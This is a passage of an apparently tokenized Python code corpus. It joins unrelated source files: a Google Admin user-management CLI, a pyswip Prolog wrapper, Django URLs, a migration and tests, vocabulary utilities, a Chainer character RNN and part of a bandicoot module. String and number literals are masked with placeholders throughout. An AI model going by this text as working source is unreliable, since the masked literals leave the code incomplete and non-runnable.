( userKey = args . userKey , body = { '<STR_LIT:status>' : True } ) . execute ( ) <EOL> def unsetadmin_user ( sv , args ) : <EOL> r = sv . makeAdmin ( userKey = args . userKey , body = { '<STR_LIT:status>' : False } ) . execute ( ) <EOL> def bulk_insert_user ( sv , args ) : <EOL> f = open ( args . jsonfile , '<STR_LIT:r>' ) <EOL> users = json . load ( f , '<STR_LIT:utf-8>' ) <EOL> for user in users : <EOL> r = sv . insert ( body = user ) . execute ( ) <EOL> if args . verbose : <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( parents = [ tools . argparser ] ) <EOL> subparsers = parser . add_subparsers ( help = '<STR_LIT>' ) <EOL> parser_list = subparsers . add_parser ( '<STR_LIT:list>' , help = '<STR_LIT>' ) <EOL> parser_list . 
add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT:-c>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , choices = [ '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> default = '<STR_LIT:email>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , type = int , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . set_defaults ( func = list_user ) <EOL> parser_get = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_get . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_get . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_get . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_get . set_defaults ( func = get_user ) <EOL> parser_insert = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT:password>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> parser_insert . 
add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_insert . set_defaults ( func = insert_user ) <EOL> parser_patch = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , choices = [ '<STR_LIT:true>' , '<STR_LIT:false>' ] , <EOL> help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , choices = [ '<STR_LIT:true>' , '<STR_LIT:false>' ] , <EOL> help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_patch . set_defaults ( func = patch_user ) <EOL> parser_delete = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_delete . add_argument ( '<STR_LIT>' ) <EOL> parser_delete . set_defaults ( func = delete_user ) <EOL> parser_setadmin = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_setadmin . 
add_argument ( '<STR_LIT>' ) <EOL> parser_setadmin . set_defaults ( func = setadmin_user ) <EOL> parser_unsetadmin = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_unsetadmin . add_argument ( '<STR_LIT>' ) <EOL> parser_unsetadmin . set_defaults ( func = unsetadmin_user ) <EOL> parser_bi = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_bi . set_defaults ( func = bulk_insert_user ) <EOL> args = parser . parse_args ( ) <EOL> FLOW = flow_from_clientsecrets ( CLIENT_SECRETS , <EOL> scope = SCOPES , <EOL> message = MISSING_CLIENT_SECRETS_MESSAGE ) <EOL> storage = Storage ( CREDENTIALS_PATH ) <EOL> credentials = storage . get ( ) <EOL> if credentials is None or credentials . invalid : <EOL> print '<STR_LIT>' <EOL> credentials = tools . run_flow ( FLOW , storage , args ) <EOL> http = httplib2 . Http ( ) <EOL> http = credentials . authorize ( http ) <EOL> service = build ( '<STR_LIT>' , '<STR_LIT>' , http = http ) <EOL> sv = service . users ( ) <EOL> args . func ( sv , args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . stdout = codecs . getwriter ( '<STR_LIT>' ) ( sys . stdout ) <EOL> main ( ) </s>
<s> import sys <EOL> from pyswip . core import * <EOL> class PrologError ( Exception ) : <EOL> pass <EOL> class NestedQueryError ( PrologError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _initialize ( ) : <EOL> args = [ ] <EOL> args . append ( "<STR_LIT>" ) <EOL> args . append ( "<STR_LIT>" ) <EOL> args . append ( "<STR_LIT>" ) <EOL> if SWI_HOME_DIR is not None : <EOL> args . append ( "<STR_LIT>" % SWI_HOME_DIR ) <EOL> result = PL_initialise ( len ( args ) , args ) <EOL> if not result : <EOL> raise PrologError ( "<STR_LIT>" <EOL> "<STR_LIT>" % result ) <EOL> swipl_fid = PL_open_foreign_frame ( ) <EOL> swipl_load = PL_new_term_ref ( ) <EOL> PL_chars_to_term ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , swipl_load ) <EOL> PL_call ( swipl_load , None ) <EOL> PL_discard_foreign_frame ( swipl_fid ) <EOL> _initialize ( ) <EOL> from pyswip . easy import getTerm <EOL> class Prolog : <EOL> """<STR_LIT>""" <EOL> _queryIsOpen = False <EOL> class _QueryWrapper ( object ) : <EOL> def __init__ ( self ) : <EOL> if Prolog . _queryIsOpen : <EOL> raise NestedQueryError ( "<STR_LIT>" ) <EOL> def __call__ ( self , query , maxresult , catcherrors , normalize ) : <EOL> swipl_fid = PL_open_foreign_frame ( ) <EOL> swipl_head = PL_new_term_ref ( ) <EOL> swipl_args = PL_new_term_refs ( <NUM_LIT:2> ) <EOL> swipl_goalCharList = swipl_args <EOL> swipl_bindingList = swipl_args + <NUM_LIT:1> <EOL> PL_put_list_chars ( swipl_goalCharList , query ) <EOL> swipl_predicate = PL_predicate ( "<STR_LIT>" , <NUM_LIT:2> , None ) <EOL> plq = catcherrors and ( PL_Q_NODEBUG | PL_Q_CATCH_EXCEPTION ) or PL_Q_NORMAL <EOL> swipl_qid = PL_open_query ( None , plq , swipl_predicate , swipl_args ) <EOL> Prolog . _queryIsOpen = True <EOL> try : <EOL> while maxresult and PL_next_solution ( swipl_qid ) : <EOL> maxresult -= <NUM_LIT:1> <EOL> bindings = [ ] <EOL> swipl_list = PL_copy_term_ref ( swipl_bindingList ) <EOL> t = getTerm ( swipl_list ) <EOL> if normalize : <EOL> try : <EOL> v = t . 
value <EOL> except AttributeError : <EOL> v = { } <EOL> for r in [ x . value for x in t ] : <EOL> v . update ( r ) <EOL> yield v <EOL> else : <EOL> yield t <EOL> if PL_exception ( swipl_qid ) : <EOL> term = getTerm ( PL_exception ( swipl_qid ) ) <EOL> raise PrologError ( "<STR_LIT>" . join ( [ "<STR_LIT>" , query , "<STR_LIT>" , <EOL> "<STR_LIT>" , str ( term ) , "<STR_LIT>" ] ) ) <EOL> finally : <EOL> PL_cut_query ( swipl_qid ) <EOL> PL_discard_foreign_frame ( swipl_fid ) <EOL> Prolog . _queryIsOpen = False <EOL> def asserta ( cls , assertion , catcherrors = False ) : <EOL> next ( cls . query ( assertion . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> asserta = classmethod ( asserta ) <EOL> def assertz ( cls , assertion , catcherrors = False ) : <EOL> next ( cls . query ( assertion . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> assertz = classmethod ( assertz ) <EOL> def dynamic ( cls , term , catcherrors = False ) : <EOL> next ( cls . query ( term . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> dynamic = classmethod ( dynamic ) <EOL> def retract ( cls , term , catcherrors = False ) : <EOL> next ( cls . query ( term . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> retract = classmethod ( retract ) <EOL> def retractall ( cls , term , catcherrors = False ) : <EOL> next ( cls . query ( term . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> retractall = classmethod ( retractall ) <EOL> def consult ( cls , filename , catcherrors = False ) : <EOL> next ( cls . query ( filename . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> consult = classmethod ( consult ) <EOL> def query ( cls , query , maxresult = - <NUM_LIT:1> , catcherrors = True , normalize = True ) : <EOL> """<STR_LIT>""" <EOL> return cls . 
_QueryWrapper ( ) ( query , maxresult , catcherrors , normalize ) <EOL> query = classmethod ( query ) <EOL> def _test ( ) : <EOL> lines = [ ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> prolog = Prolog ( ) <EOL> for code , comment in lines : <EOL> print ( "<STR_LIT>" , code , "<STR_LIT:[>" , comment , "<STR_LIT:]>" ) <EOL> print ( list ( prolog . query ( code ) ) ) <EOL> for r in prolog . query ( "<STR_LIT>" ) : <EOL> print ( r [ "<STR_LIT:X>" ] , "<STR_LIT>" , r [ "<STR_LIT:Y>" ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> _test ( ) </s>
<s> from django . conf . urls import patterns , url <EOL> from siteuser . users import views <EOL> from siteuser . settings import USING_SOCIAL_LOGIN <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . SiteUserLoginView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserRegisterView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepOneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepOneDoneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepTwoDoneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepTwoView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserChangePwView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserChangePwDoneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . logout , name = '<STR_LIT>' ) , <EOL> ) <EOL> if USING_SOCIAL_LOGIN : <EOL> urlpatterns += patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . social_login_callback ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import re <EOL> import codecs <EOL> class VocabConstants ( ) : <EOL> """<STR_LIT>""" <EOL> UNK = "<STR_LIT>" <EOL> SOS = "<STR_LIT>" <EOL> EOS = "<STR_LIT>" <EOL> UNK_INDEX = <NUM_LIT:0> <EOL> SOS_INDEX = <NUM_LIT:1> <EOL> EOS_INDEX = <NUM_LIT:2> <EOL> def load_text ( in_file ) : <EOL> """<STR_LIT>""" <EOL> f = codecs . open ( in_file , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> lines = [ ] <EOL> for line in f : <EOL> lines . append ( line . strip ( ) ) <EOL> f . close ( ) <EOL> return lines <EOL> def get_vocab ( corpus_file , vocab_file , freq , vocab_size ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( vocab_file ) : <EOL> ( vocab_map , vocab_size ) = load_vocab ( vocab_file ) <EOL> else : <EOL> ( words , vocab_map , freq_map , vocab_size , num_train_words , <EOL> num_lines ) = load_vocab_from_corpus ( corpus_file , freq , vocab_size ) <EOL> write_vocab ( vocab_file , words ) <EOL> return ( vocab_map , vocab_size ) <EOL> def get_mapped_sentence ( corpus_file , vocab_map , sentence_map_file ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( sentence_map_file ) : <EOL> sentences = load_mapped_sentence ( sentence_map_file ) <EOL> else : <EOL> sentences = [ ] <EOL> lines = load_text ( corpus_file ) <EOL> for line in lines : <EOL> tokens = line . strip ( ) . split ( ) <EOL> mapping = to_id_int ( tokens , vocab_map , <NUM_LIT:0> ) <EOL> sentences . append ( mapping ) <EOL> write_mapped_sentence ( sentences , sentence_map_file ) <EOL> return sentences <EOL> def write_mapped_sentence ( sentences , sentence_map_file ) : <EOL> f = open ( sentence_map_file , '<STR_LIT:w>' ) <EOL> for sentence in sentences : <EOL> sentence = [ str ( x ) for x in sentence ] <EOL> f . write ( '<STR_LIT:U+0020>' . 
join ( sentence ) + '<STR_LIT:\n>' ) <EOL> return <EOL> def load_mapped_sentence ( sentence_map_file ) : <EOL> sentences = [ ] <EOL> lines = load_text ( sentence_map_file ) <EOL> for line in lines : <EOL> ids = line . strip ( ) . split ( ) <EOL> int_ids = [ int ( i ) for i in ids ] <EOL> sentences . append ( int_ids ) <EOL> return sentences <EOL> def add_word_to_vocab ( word , words , vocab_map , vocab_size ) : <EOL> """<STR_LIT>""" <EOL> if word not in vocab_map : <EOL> words . append ( word ) <EOL> vocab_map [ word ] = vocab_size <EOL> vocab_size += <NUM_LIT:1> <EOL> return ( words , vocab_map , vocab_size ) <EOL> def to_id_int ( tokens , vocab_map , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> unk = VocabConstants . UNK <EOL> return [ int ( vocab_map [ token ] + offset ) if token in vocab_map else str ( vocab_map [ unk ] + offset ) for token in tokens ] <EOL> def to_id ( tokens , vocab_map , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> unk = VocabConstants . UNK <EOL> return [ str ( vocab_map [ token ] + offset ) if token in vocab_map else str ( vocab_map [ unk ] + offset ) for token in tokens ] <EOL> def to_text ( indices , words , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return [ words [ int ( index ) - offset ] for index in indices ] <EOL> def write_vocab ( out_file , words , freqs = [ ] ) : <EOL> """<STR_LIT>""" <EOL> f = codecs . open ( out_file , '<STR_LIT:w>' , '<STR_LIT:utf-8>' ) <EOL> vocab_size = <NUM_LIT:0> <EOL> for word in words : <EOL> if len ( freqs ) == <NUM_LIT:0> : <EOL> f . write ( '<STR_LIT>' % word ) <EOL> else : <EOL> f . write ( '<STR_LIT>' % ( word , freqs [ vocab_size ] ) ) <EOL> vocab_size += <NUM_LIT:1> <EOL> f . close ( ) <EOL> def load_vocab ( in_file ) : <EOL> """<STR_LIT>""" <EOL> sos = VocabConstants . SOS <EOL> eos = VocabConstants . EOS <EOL> unk = VocabConstants . UNK <EOL> vocab_inf = codecs . 
open ( in_file , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> words = [ ] <EOL> vocab_map = { } <EOL> vocab_size = <NUM_LIT:0> <EOL> for line in vocab_inf : <EOL> tokens = re . split ( '<STR_LIT>' , line . strip ( ) ) <EOL> word = tokens [ <NUM_LIT:0> ] <EOL> words . append ( word ) <EOL> vocab_map [ word ] = vocab_size <EOL> vocab_size += <NUM_LIT:1> <EOL> for word in [ sos , eos , unk ] : <EOL> ( words , vocab_map , vocab_size ) = add_word_to_vocab ( <EOL> word , words , vocab_map , vocab_size ) <EOL> vocab_inf . close ( ) <EOL> return ( vocab_map , vocab_size ) <EOL> def inverse_vocab ( vocab ) : <EOL> """<STR_LIT>""" <EOL> inv_vocab = { } <EOL> for k , v in vocab . iteritems ( ) : <EOL> inv_vocab [ v ] = k <EOL> return inv_vocab <EOL> def load_vocab_from_corpus ( in_file , freq , max_vocab_size ) : <EOL> """<STR_LIT>""" <EOL> f = codecs . open ( in_file , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> words = [ ] <EOL> vocab_map = { } <EOL> freq_map = { } <EOL> vocab_size = <NUM_LIT:0> <EOL> num_train_words = <NUM_LIT:0> <EOL> num_lines = <NUM_LIT:0> <EOL> for line in f : <EOL> tokens = re . split ( '<STR_LIT>' , line . strip ( ) ) <EOL> num_train_words += len ( tokens ) <EOL> for token in tokens : <EOL> if token not in vocab_map : <EOL> words . append ( token ) <EOL> vocab_map [ token ] = vocab_size <EOL> freq_map [ token ] = <NUM_LIT:0> <EOL> vocab_size += <NUM_LIT:1> <EOL> freq_map [ token ] += <NUM_LIT:1> <EOL> num_lines += <NUM_LIT:1> <EOL> if num_lines % <NUM_LIT> == <NUM_LIT:0> : <EOL> sys . stderr . write ( '<STR_LIT>' % num_lines ) <EOL> f . close ( ) <EOL> if freq > <NUM_LIT:0> or max_vocab_size > <NUM_LIT:0> : <EOL> ( words , vocab_map , freq_map , vocab_size ) = update_vocab ( <EOL> words , vocab_map , freq_map , freq , max_vocab_size ) <EOL> return ( words , vocab_map , freq_map , vocab_size , num_train_words , num_lines ) <EOL> def update_vocab ( words , vocab_map , freq_map , freq , max_vocab_size ) : <EOL> """<STR_LIT>""" <EOL> unk = VocabConstants . 
UNK <EOL> sos = VocabConstants . SOS <EOL> eos = VocabConstants . EOS <EOL> new_words = [ unk , sos , eos ] <EOL> new_vocab_map = { unk : VocabConstants . UNK_INDEX , sos : VocabConstants . SOS_INDEX , eos : VocabConstants . EOS_INDEX } <EOL> new_freq_map = { unk : <NUM_LIT:0> , sos : <NUM_LIT:0> , eos : <NUM_LIT:0> } <EOL> vocab_size = <NUM_LIT:3> <EOL> if freq > <NUM_LIT:0> : <EOL> for word in words : <EOL> if freq_map [ word ] < freq : <EOL> new_freq_map [ unk ] += freq_map [ word ] <EOL> else : <EOL> new_words . append ( word ) <EOL> new_vocab_map [ word ] = vocab_size <EOL> new_freq_map [ word ] = freq_map [ word ] <EOL> vocab_size += <NUM_LIT:1> <EOL> sys . stderr . write ( '<STR_LIT>' % ( <EOL> freq , unk , vocab_size , new_freq_map [ unk ] ) ) <EOL> else : <EOL> assert ( max_vocab_size > <NUM_LIT:0> ) <EOL> sorted_items = sorted ( <EOL> freq_map . items ( ) , key = lambda x : x [ <NUM_LIT:1> ] , reverse = True ) <EOL> for ( word , freq ) in sorted_items : <EOL> new_words . append ( word ) <EOL> new_vocab_map [ word ] = vocab_size <EOL> new_freq_map [ word ] = freq <EOL> vocab_size += <NUM_LIT:1> <EOL> if vocab_size == max_vocab_size : <EOL> break <EOL> return ( new_words , new_vocab_map , new_freq_map , vocab_size ) <EOL> def getOriginalIndeces ( indeces , offset ) : <EOL> orig = [ ] <EOL> for i in indeces : <EOL> orig . append ( i - offset ) <EOL> return orig <EOL> def getWordsFromIndeces ( indeces , vocab , offset ) : <EOL> words = [ ] <EOL> for i in indeces : <EOL> words . append ( vocab [ i - offset ] ) <EOL> return words </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT:path>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT:source>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT:error>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:error>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:path>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:error>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) 
, <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from datetime import datetime , timedelta <EOL> from django . test import TestCase <EOL> from . . models import Report , Fix <EOL> from . . settings import CONFIG <EOL> def create_fix ( ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> kwargs [ '<STR_LIT>' ] = Report . objects . create ( url = '<STR_LIT>' ) <EOL> return Fix . objects . create ( ** kwargs ) <EOL> class ReportTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> expiration_days = CONFIG [ '<STR_LIT>' ] <EOL> self . report1 = Report . objects . create ( url = '<STR_LIT>' ) <EOL> expired_datetime = datetime . now ( ) - timedelta ( days = expiration_days + <NUM_LIT:1> ) <EOL> self . report2 = Report . objects . create ( <EOL> url = '<STR_LIT>' , created_on = expired_datetime <EOL> ) <EOL> def test_expired ( self ) : <EOL> self . assertFalse ( self . report1 . expired ( ) ) <EOL> self . assertTrue ( self . report2 . expired ( ) ) <EOL> def test_delete_expired ( self ) : <EOL> Report . objects . delete_expired ( ) <EOL> qs = Report . objects . all ( ) <EOL> self . assertEqual ( qs . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( qs [ <NUM_LIT:0> ] . pk , <NUM_LIT:1> ) <EOL> class FixTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . fix = create_fix ( description = '<STR_LIT>' ) <EOL> def test_caches_description_html ( self ) : <EOL> self . assertEqual ( self . fix . description_html , '<STR_LIT>' ) <EOL> def test_updates_description_html ( self ) : <EOL> self . fix . description = '<STR_LIT>' <EOL> self . fix . save ( ) <EOL> self . assertEqual ( self . fix . description_html , '<STR_LIT>' ) </s>
<s> import numpy as np <EOL> from chainer import Variable , FunctionSet <EOL> import chainer . functions as F <EOL> import chainer . links as L <EOL> class CharRNN ( FunctionSet ) : <EOL> def __init__ ( self , n_vocab , n_units ) : <EOL> super ( CharRNN , self ) . __init__ ( <EOL> embed = F . EmbedID ( n_vocab , n_units ) , <EOL> l1_x = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l1_h = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l2_h = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l2_x = L . Linear ( n_units , <NUM_LIT:4> * n_units ) , <EOL> l3 = L . Linear ( n_units , n_vocab ) , <EOL> ) <EOL> for param in self . parameters : <EOL> param [ : ] = np . random . uniform ( - <NUM_LIT> , <NUM_LIT> , param . shape ) <EOL> def forward_one_step ( self , x_data , y_data , state , train = True , dropout_ratio = <NUM_LIT:0.5> ) : <EOL> x = Variable ( x_data , volatile = not train ) <EOL> t = Variable ( y_data , volatile = not train ) <EOL> h0 = self . embed ( x ) <EOL> h1_in = self . l1_x ( F . dropout ( h0 , ratio = dropout_ratio , train = train ) ) + self . l1_h ( state [ '<STR_LIT>' ] ) <EOL> c1 , h1 = F . lstm ( state [ '<STR_LIT>' ] , h1_in ) <EOL> h2_in = self . l2_x ( F . dropout ( h1 , ratio = dropout_ratio , train = train ) ) + self . l2_h ( state [ '<STR_LIT>' ] ) <EOL> c2 , h2 = F . lstm ( state [ '<STR_LIT>' ] , h2_in ) <EOL> y = self . l3 ( F . dropout ( h2 , ratio = dropout_ratio , train = train ) ) <EOL> state = { '<STR_LIT>' : c1 , '<STR_LIT>' : h1 , '<STR_LIT>' : c2 , '<STR_LIT>' : h2 } <EOL> if train : <EOL> return state , F . softmax_cross_entropy ( y , t ) <EOL> else : <EOL> return state , F . softmax ( y ) <EOL> def make_initial_state ( n_units , batchsize = <NUM_LIT:50> , train = True ) : <EOL> return { name : Variable ( np . zeros ( ( batchsize , n_units ) , dtype = np . float32 ) , <EOL> volatile = not train ) <EOL> for name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } </s>
<s> from bandicoot . helper . tools import OrderedDict , warning_str <EOL> from bandicoot . helper . group import group_records , DATE_GROUPERS <EOL> import bandicoot as bc <EOL> from functools import partial <EOL> def flatten ( d , parent_key = '<STR_LIT>' , separator = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> for k , v in d . items ( ) : <EOL> new_key = parent_key + separator + k if parent_key else k <EOL> if isinstance ( v , dict ) : <EOL> items . extend ( flatten ( v , new_key , separator ) . items ( ) ) <EOL> else : <EOL> items . append ( ( new_key , v ) ) <EOL> return OrderedDict ( items ) <EOL> def all ( user , groupby = '<STR_LIT>' , summary = '<STR_LIT:default>' , network = False , split_week = False , split_day = False , attributes = True , flatten = False ) : <EOL> """<STR_LIT>""" <EOL> if groupby is not None : <EOL> if len ( set ( DATE_GROUPERS [ groupby ] ( r . datetime ) for r in user . records ) ) <= <NUM_LIT:1> : <EOL> print warning_str ( '<STR_LIT>' ) <EOL> scalar_type = '<STR_LIT>' if groupby == '<STR_LIT>' else '<STR_LIT>' <EOL> summary_type = 